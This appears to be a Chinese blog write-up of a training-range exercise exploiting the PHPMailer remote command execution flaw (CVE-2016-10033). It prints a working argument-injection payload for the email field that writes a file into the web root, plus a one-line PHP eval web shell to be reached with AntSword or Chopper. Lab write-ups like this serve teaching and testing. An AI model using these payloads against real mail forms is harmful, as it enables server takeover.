当前位置:网站首页>墨者学院-PHPMailer远程命令执行漏洞溯源
墨者学院-PHPMailer远程命令执行漏洞溯源
2022-07-04 07:40:00 【Lyswbb】
拿到靶场之后点击访问
工具
分享一个小工具,用来爬取相关的url Link Gopher
可以看到有用的就一个mail.php
进入之后来到一个邮件测试页面,很明显这里是一个功能点
phpmailer介绍
PHPMailer是一个用于发送电子邮件的PHP函数包。直接用PHP就可以发送,无需搭建复杂的Email服务。相关漏洞CVE编号(CVE-2016-10033)
burp抓包,更改email处payload为
"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/1.php @aaa.com
更改message处payload为
<?php @eval($_POST[cmd]);?>
然后访问http://124.70.71.251:44768/1.php,使用蚁剑或者菜刀连接即可
边栏推荐
- Basic DOS commands
- 人生规划(Flag)
- flask-sqlalchemy 循环引用
- 2022-021ARTS:下半年开始
- 真空介电常数和真空磁导率究竟是由什么决定的?为何会存在这两个物理量?
- Système de surveillance zabbix contenu de surveillance personnalisé
- tornado之目录
- Go learning notes - constants
- How to use MOS tube to realize the anti reverse connection circuit of power supply
- Rhcsa day 3
猜你喜欢
[web security] nodejs prototype chain pollution analysis
Linear algebra 1.1
Write a thread pool by hand, and take you to learn the implementation principle of ThreadPoolExecutor thread pool
Solution of running crash caused by node error
谷歌官方回应:我们没有放弃TensorFlow,未来与JAX并肩发展
Preliminary study on temporal database incluxdb 2.2
Introduction to neural network (Part 2)
手写简易版flexible.js以及源码分析
How to use MOS tube to realize the anti reverse connection circuit of power supply
Summary of MySQL common judgment functions!! Have you used it
随机推荐
Leetcode (215) -- the kth largest element in the array
Literature collation and thesis reading methods
Zephyr 學習筆記2,Scheduling
L1-021 important words three times (5 points)
Book list | as the technical support Party of the Winter Olympics, Alibaba cloud's technology is written in these books!
Easy to understand: understand the time series database incluxdb
Technical experts from large factories: common thinking models in architecture design
Devops Practice Guide - reading notes (long text alarm)
MySQL中的文本处理函数整理,收藏速查
jdbc连接es查询的时候,有遇到下面这种情况的大神嘛?
PCIE知识点-010:PCIE 热插拔资料从哪获取
L1-030 one gang one (15 points)
Linear algebra 1.1
[Chongqing Guangdong education] National Open University spring 2019 770 real estate appraisal reference questions
[Android reverse] function interception (use cache_flush system function to refresh CPU cache | refresh CPU cache disadvantages | recommended time for function interception)
2022-021ARTS:下半年開始
SQL注入测试工具之Sqli-labs下载安装重置数据库报错解决办法之一(#0{main}thrown in D:\Software\phpstudy_pro\WWW\sqli-labs-……)
2022-021ARTS:下半年开始
zabbix監控系統自定義監控內容
神经网络入门(下)